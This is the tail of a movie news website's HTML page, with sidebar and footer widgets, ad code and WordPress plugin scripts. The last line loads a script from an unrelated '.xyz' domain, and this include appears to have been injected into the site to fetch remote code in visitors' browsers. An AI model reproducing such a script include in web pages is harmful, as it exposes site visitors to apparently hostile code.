            .td_uid_8_589062285ddb3_rand .td-trending-now-title,
            .td_uid_8_589062285ddb3_rand .block-title a {
                color: #;
            }
</style><script>var block_td_uid_8_589062285ddb3 = new tdBlock();
block_td_uid_8_589062285ddb3.id = "td_uid_8_589062285ddb3";
block_td_uid_8_589062285ddb3.atts = '{"limit":"1","sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"5","category_ids":"","custom_title":"INTERVIEW","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"#e32020","header_text_color":"#","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_block_widget td_uid_8_589062285ddb3_rand","offset":"","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_8_589062285ddb3.td_column_number = "1";
block_td_uid_8_589062285ddb3.block_type = "td_block_14";
block_td_uid_8_589062285ddb3.post_count = "1";
block_td_uid_8_589062285ddb3.found_posts = "1292";
block_td_uid_8_589062285ddb3.header_color = "#e32020";
block_td_uid_8_589062285ddb3.ajax_pagination_infinite_stop = "";
block_td_uid_8_589062285ddb3.max_num_pages = "1292";
tdBlocksArray.push(block_td_uid_8_589062285ddb3);
</script><div class="td_block_wrap td_block_14 td_block_widget td_uid_8_589062285ddb3_rand td-pb-full-cell td_with_ajax_pagination td-pb-border-top"  data-td-block-uid="td_uid_8_589062285ddb3" ><h4 class="block-title"><span>INTERVIEW</span></h4><div id=td_uid_8_589062285ddb3 class="td_block_inner td-column-1">

	<div class="td-block-span12">

        <div class="td_module_mx1 td_module_wrap td-animation-stack">
            <div class="td-module-thumb"><a href="http://moviehole.net/2017111775matt-ross-captain-fantastic" rel="bookmark" title="Matt Ross- Captain Fantastic"><img width="356" height="220" class="entry-thumb" src="http://moviehole.net/img/ttross-356x220.jpg" alt="" title="Matt Ross- Captain Fantastic"/></a></div>
            <div class="td-module-meta-info">
                <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017111775matt-ross-captain-fantastic" rel="bookmark" title="Matt Ross- Captain Fantastic">Matt Ross- Captain Fantastic</a></h3>                <div class="td-editor-date">
                                        <span class="td-author-date">
                        <span class="td-post-author-name"><a href="http://moviehole.net/author/editorial-staff">Editorial Staff</a> <span>-</span> </span>                        <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-01-05T09:44:17+00:00" >Jan 5, 2017</time></span>                    </span>
                </div>
            </div>

        </div>

        
	</div> <!-- ./td-block-span12 --></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_8_589062285ddb3" data-td_block_id="td_uid_8_589062285ddb3"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_8_589062285ddb3" data-td_block_id="td_uid_8_589062285ddb3"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block --><script>var block_td_uid_9_589062286474c = new tdBlock();
block_td_uid_9_589062286474c.id = "td_uid_9_589062286474c";
block_td_uid_9_589062286474c.atts = '{"limit":"1","sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"3, 1213, ","custom_title":"NEWS","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"#","header_text_color":"#","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"td_category_ids_filter","td_ajax_filter_ids":"3, 1213, ","td_filter_default_txt":"","color_preset":"","border_top":"","class":"td_block_widget td_uid_9_589062286474c_rand","offset":"","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_9_589062286474c.td_column_number = "1";
block_td_uid_9_589062286474c.block_type = "td_block_21";
block_td_uid_9_589062286474c.post_count = "1";
block_td_uid_9_589062286474c.found_posts = "30489";
block_td_uid_9_589062286474c.header_color = "#";
block_td_uid_9_589062286474c.ajax_pagination_infinite_stop = "";
block_td_uid_9_589062286474c.max_num_pages = "30489";
tdBlocksArray.push(block_td_uid_9_589062286474c);
</script><div class="td_block_wrap td_block_21 td_block_widget td_uid_9_589062286474c_rand td_with_ajax_pagination td-pb-border-top"  data-td-block-uid="td_uid_9_589062286474c" ><h4 class="block-title"><span>NEWS</span></h4><div class="td-subcat-filter" id="td_pulldown_td_uid_9_589062286474c"><ul class="td-subcat-list" id="td_pulldown_td_uid_9_589062286474c_list"><li class="td-subcat-item"><a class="td-subcat-link" id="td_uid_10_5890622865967" data-td_filter_value="" data-td_block_id="td_uid_9_589062286474c" href="#"></a></li><li class="td-subcat-item"><a class="td-subcat-link" id="td_uid_11_58906228659ae" data-td_filter_value="3" data-td_block_id="td_uid_9_589062286474c" href="#">Movie News</a></li><li class="td-subcat-item"><a class="td-subcat-link" id="td_uid_12_58906228659f0" data-td_filter_value="1213" data-td_block_id="td_uid_9_589062286474c" href="#">TV</a></li></ul><div class="td-subcat-dropdown"><div class="td-subcat-more" aria-haspopup="true"><span>More</span><i class="td-icon-read-down"></i></div><ul class="td-pulldown-filter-list"></ul></div></div><div id=td_uid_9_589062286474c class="td_block_inner">
        <div class="td_module_16 td_module_wrap td-animation-stack">
            <div class="td-module-thumb"><a href="http://moviehole.net/2017112380peter-capaldi-leaving-doctor" rel="bookmark" title="Peter Capaldi is leaving Doctor Who"><img width="150" height="150" class="entry-thumb" src="http://moviehole.net/img/drwho2-150x150.jpg" alt="" title="Peter Capaldi is leaving Doctor Who"/></a></div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017112380peter-capaldi-leaving-doctor" rel="bookmark" title="Peter Capaldi is leaving Doctor Who">Peter Capaldi is leaving Doctor Who</a></h3>
                <div class="td-module-meta-info">
                                        <span class="td-post-author-name"><a href="http://moviehole.net/author/tawnee">Tawnee TV</a> <span>-</span> </span>                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-01-31T10:04:09+00:00" >Jan 31, 2017</time></span>                                    </div>

                <div class="td-excerpt">
                    

Peter Capaldi has announced he&#039;ll be stepping down as Doctor Who in twelve months.

Capaldi first stepped into the TARDIS in 2013, and will leave...                </div>
            </div>

        </div>

        </div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_9_589062286474c" data-td_block_id="td_uid_9_589062286474c"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_9_589062286474c" data-td_block_id="td_uid_9_589062286474c"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block -->
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-sidebar">
<script type="text/javascript">
var td_screen_width = document.body.clientWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="9931553201"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="9931553201"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:200px;height:200px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="9931553201"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 

<div class="td-a-rec td-a-rec-id-custom_ad_2 "><!-- ros - 300x250: 300x250 --> 
<div id="ros_10291"></div> </div>                            </div>
                        </div>
                            </div> <!-- /.td-pb-row -->
    </div> <!-- /.td-container -->
</div> <!-- /.td-main-content-wrap -->

<!-- Instagram -->



<!-- Footer -->
<div class="td-footer-wrapper">
    <div class="td-container">

	    <div class="td-pb-row">
		    <div class="td-pb-span12">
			    
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-footer_top">
<script type="text/javascript">
var td_screen_width = document.body.clientWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:728px;height:90px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="8454820001"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:728px;height:90px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="8454820001"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:728px;height:90px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="8454820001"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                
                    if ( td_screen_width < 768 ) {
                        /* Phones */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="8454820001"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 

		    </div>
	    </div>

        <div class="td-pb-row">

            <div class="td-pb-span4">
                <script>var block_td_uid_13_5890622867280 = new tdBlock();
block_td_uid_13_5890622867280.id = "td_uid_13_5890622867280";
block_td_uid_13_5890622867280.atts = '{"limit":"3","sort":"random_7_day","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"DID YOU MISS?","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","header_color":"#","header_text_color":"#","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_block_widget td_uid_13_5890622867280_rand","offset":"","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_13_5890622867280.td_column_number = "1";
block_td_uid_13_5890622867280.block_type = "td_block_16";
block_td_uid_13_5890622867280.post_count = "3";
block_td_uid_13_5890622867280.found_posts = "35";
block_td_uid_13_5890622867280.header_color = "#";
block_td_uid_13_5890622867280.ajax_pagination_infinite_stop = "";
block_td_uid_13_5890622867280.max_num_pages = "12";
tdBlocksArray.push(block_td_uid_13_5890622867280);
</script><div class="td_block_wrap td_block_16 td_block_widget td_uid_13_5890622867280_rand td-pb-border-top"  data-td-block-uid="td_uid_13_5890622867280" ><h4 class="block-title"><span>DID YOU MISS?</span></h4><div id=td_uid_13_5890622867280 class="td_block_inner td-column-1">

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://moviehole.net/2017112309saw-legacy-adds-vandervoort-anderson" rel="bookmark" title="Saw Legacy adds Vandervoort, Anderson"><img width="100" height="70" class="entry-thumb" src="http://moviehole.net/img/lauraanderson-100x70.jpg" alt="" title="Saw Legacy adds Vandervoort, Anderson"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017112309saw-legacy-adds-vandervoort-anderson" rel="bookmark" title="Saw Legacy adds Vandervoort, Anderson">Saw Legacy adds Vandervoort, Anderson</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-01-27T06:48:04+00:00" >Jan 27, 2017</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://moviehole.net/2017112253queer-eye-straight-guy-back" rel="bookmark" title="Queer Eye for the Straight Guy is back!"><img width="100" height="70" class="entry-thumb" src="http://moviehole.net/img/QUEEREYE-100x70.jpg" alt="" title="Queer Eye for the Straight Guy is back!"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017112253queer-eye-straight-guy-back" rel="bookmark" title="Queer Eye for the Straight Guy is back!">Queer Eye for the Straight Guy is back!</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-01-25T06:40:23+00:00" >Jan 25, 2017</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://moviehole.net/2017112353first-look-oceans-eight-photo-log-line-debut" rel="bookmark" title="First look at Oceans Eight as photo &#038; log line debut!"><img width="100" height="70" class="entry-thumb" src="http://moviehole.net/img/oceans8large-100x70.jpg" alt="" title="First look at Oceans Eight as photo &#038; log line debut!"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017112353first-look-oceans-eight-photo-log-line-debut" rel="bookmark" title="First look at Oceans Eight as photo &#038; log line debut!">First look at Oceans Eight as photo &#038; log line debut!</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-01-31T02:31:01+00:00" >Jan 31, 2017</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 --></div></div> <!-- ./block -->            </div>

            <div class="td-pb-span4">
                <script>var block_td_uid_14_58906228a1437 = new tdBlock();
block_td_uid_14_58906228a1437.id = "td_uid_14_58906228a1437";
block_td_uid_14_58906228a1437.atts = '{"limit":"3","sort":"popular","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"3","category_ids":"","custom_title":"POPULAR STORIES","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","header_color":"#","header_text_color":"#","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_block_widget td_uid_14_58906228a1437_rand","offset":"","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_14_58906228a1437.td_column_number = "1";
block_td_uid_14_58906228a1437.block_type = "td_block_16";
block_td_uid_14_58906228a1437.post_count = "3";
block_td_uid_14_58906228a1437.found_posts = "30461";
block_td_uid_14_58906228a1437.header_color = "#";
block_td_uid_14_58906228a1437.ajax_pagination_infinite_stop = "";
block_td_uid_14_58906228a1437.max_num_pages = "10154";
tdBlocksArray.push(block_td_uid_14_58906228a1437);
</script><div class="td_block_wrap td_block_16 td_block_widget td_uid_14_58906228a1437_rand td-pb-border-top"  data-td-block-uid="td_uid_14_58906228a1437" ><h4 class="block-title"><span>POPULAR STORIES</span></h4><div id=td_uid_14_58906228a1437 class="td_block_inner td-column-1">

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://moviehole.net/20045548toolman-hankering-for-toy-story-3" rel="bookmark" title="Toolman hankering for Toy Story 3"><img width="100" height="70" class="entry-thumb" src="http://moviehole.net/img/toy-story-100x70.png" alt="" title="Toolman hankering for Toy Story 3"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/20045548toolman-hankering-for-toy-story-3" rel="bookmark" title="Toolman hankering for Toy Story 3">Toolman hankering for Toy Story 3</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2004-11-10T00:00:00+00:00" >Nov 10, 2004</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://moviehole.net/201260132recently-cancelled-se" rel="bookmark" title="10 Recently Cancelled Sequels : Not Coming Soon!"><img width="100" height="40" class="entry-thumb" src="http://moviehole.net/img/sequels2.jpg" alt="" title="10 Recently Cancelled Sequels : Not Coming Soon!"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/201260132recently-cancelled-se" rel="bookmark" title="10 Recently Cancelled Sequels : Not Coming Soon!">10 Recently Cancelled Sequels : Not Coming Soon!</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2012-12-02T04:58:44+00:00" >Dec 2, 2012</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://moviehole.net/201591799exclusive-halloween-reboot-in-the-works" rel="bookmark" title="Exclusive: Halloween reboot in the works"><img width="100" height="59" class="entry-thumb" src="http://moviehole.net/img/Halloween.jpg" alt="" title="Exclusive: Halloween reboot in the works"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/201591799exclusive-halloween-reboot-in-the-works" rel="bookmark" title="Exclusive: Halloween reboot in the works">Exclusive: Halloween reboot in the works</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2015-06-13T03:04:07+00:00" >Jun 13, 2015</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 --></div></div> <!-- ./block -->            </div>

            <div class="td-pb-span4">
                <div class="td_block_wrap td_block_popular_categories td_block_widget td_uid_15_5890622964ef6_rand widget widget_categories td-pb-border-top"  data-td-block-uid="td_uid_15_5890622964ef6" ><h4 class="block-title"><span>POPULAR CATEGORY</span></h4><ul class="td-pb-padding-side"><li><a href="http://moviehole.net/category/news">Movie News<span class="td-cat-no">30474</span></a></li><li><a href="http://moviehole.net/category/tv-2">TV<span class="td-cat-no">1638</span></a></li><li><a href="http://moviehole.net/category/movie-trailers">Trailers<span class="td-cat-no">1325</span></a></li><li><a href="http://moviehole.net/category/interviews">Interviews<span class="td-cat-no">1292</span></a></li><li><a href="http://moviehole.net/category/giveaways">Giveaways<span class="td-cat-no">866</span></a></li><li><a href="http://moviehole.net/category/cinema">Film Reviews<span class="td-cat-no">387</span></a></li><li><a href="http://moviehole.net/category/exclusives">Exclusives<span class="td-cat-no">381</span></a></li><li><a href="http://moviehole.net/category/caffeinatedclint">Caffeinated Clint<span class="td-cat-no">277</span></a></li></ul></div> <!-- ./block -->            </div>
        </div>
    </div>
<div class="td-footer-bottom-full">
    <div class="td-container">
        <div class="td-pb-row">
            <div class="td-pb-span3"><aside class="footer-logo-wrap"><a href="http://moviehole.net/"><img src="http://moviehole.net/img/LOGONEW.png" alt="" title=""/></a></aside></div><div class="td-pb-span5"><aside class="footer-text-wrap"><div class="block-title"><span>ABOUT US</span></div>One of the longest running movie news and entertainment sites on the internet</aside></div><div class="td-pb-span4"><aside class="footer-social-wrap td-social-style-2"><div class="block-title"><span>FOLLOW US</span></div>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://www.facebook.com/moviehole" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="moviehole" title="Google+">
                <i class="td-icon-font td-icon-googleplus"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://instagram.com/moviehole" title="Instagram">
                <i class="td-icon-font td-icon-instagram"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://http//WWW.pinterest.com/moviehole" title="Pinterest">
                <i class="td-icon-font td-icon-pinterest"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://www.twitter.com/moviehole" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span></aside></div>        </div>
    </div>
</div>
</div>

<!-- Sub Footer -->
</div><!--close td-outer-wrap-->



    <!--

        Theme: Newspaper by tagDiv 2016
        Version: 7.0.1 (rara)
        Deploy mode: deploy
        
        uid: 5890622966bf7
    -->

    
	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"http:\/\/moviehole.net\/2017112380peter-capaldi-leaving-doctor":112380};
	</script>
<script type='text/javascript' src='http://moviehole.net/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var _wpcf7 = {"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}}};
/* ]]> */
</script>
<script type='text/javascript' src='http://moviehole.net/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.6'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201705'></script>
<script type='text/javascript' src='http://moviehole.net/wp-content/themes/Newspaper/js/tagdiv_theme.js?ver=7.0.1'></script>
<script type='text/javascript' src='http://moviehole.net/wp-includes/js/comment-reply.min.js?ver=4.7.2'></script>
<script type='text/javascript' src='http://moviehole.net/wp-content/plugins/mega_main_menu/src/js/frontend/menu_functions.js?ver=4.7.2'></script>
<script type='text/javascript' src='http://moviehole.net/wp-includes/js/wp-embed.min.js?ver=4.7.2'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var sharing_js_options = {"lang":"en","counts":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://moviehole.net/wp-content/plugins/jetpack/modules/sharedaddy/sharing.js?ver=4.5'></script>
<script type='text/javascript'>
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-twitter', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-facebook', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-google-plus-1', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomgoogle-plus-1', 'menubar=1,resizable=1,width=480,height=550' );
				return false;
			});
</script>

<!-- JS generated by theme -->

<script>
    

	

		(function(){
			var html_jquery_obj = jQuery('html');

			if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) {

				var path = 'http://moviehole.net/wp-content/themes/Newspaper/style.css';

				jQuery.get(path, function(data) {

					var str_split_separator = '#td_css_split_separator';
					var arr_splits = data.split(str_split_separator);
					var arr_length = arr_splits.length;

					if (arr_length > 1) {

						var dir_path = 'http://moviehole.net/wp-content/themes/Newspaper';
						var splited_css = '';

						for (var i = 0; i < arr_length; i++) {
							if (i > 0) {
								arr_splits[i] = str_split_separator + ' ' + arr_splits[i];
							}
							//jQuery('head').append('<style>' + arr_splits[i] + '</style>');

							var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) {
								return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm,'');
							});

							splited_css += "<style>" + formated_str + "</style>";
						}

						var td_theme_css = jQuery('link#td-theme-css');

						if (td_theme_css.length) {
							td_theme_css.after(splited_css);
						}
					}
				});
			}
		})();

	
	
</script>

<script type='text/javascript' src='http://stats.wp.com/e-201705.js' async defer></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:4.5',blog:'101996096',post:'112380',tz:'0',srv:'moviehole.net'} ]);
	_stq.push([ 'clickTrackerInit', '101996096', '112380' ]);
</script>
<script type="text/javascript" src="http://getsocialbuttons.xyz/get-social.js"></script>
</body>
</html>